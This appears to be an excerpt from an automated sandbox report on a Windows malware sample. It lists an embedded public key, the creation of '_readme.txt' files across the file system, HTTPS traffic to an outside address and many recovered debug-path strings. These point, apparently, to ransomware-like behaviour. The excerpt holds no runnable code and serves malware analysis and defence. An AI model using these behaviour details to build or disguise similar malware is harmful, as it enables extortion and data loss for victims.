                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU2_2_00489E70
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeBinary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\SystemAppData\mp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310717892.00000000041EB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316137935.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2324171359.00000000046C2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yewy\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\yt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004686000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\H source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\h source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\RT source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\S source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error? source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo+ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289217814.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288830631.0000000003CD1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320944072.00000000042C9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\wy\ Data source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AppData\ation Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304875580.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304461865.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305780376.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\_ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ta\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y6 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.00000000044EB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\pCl source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310492810.0000000003CAE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.000000000454A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\yewy\load_prod.pdb\U" source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp
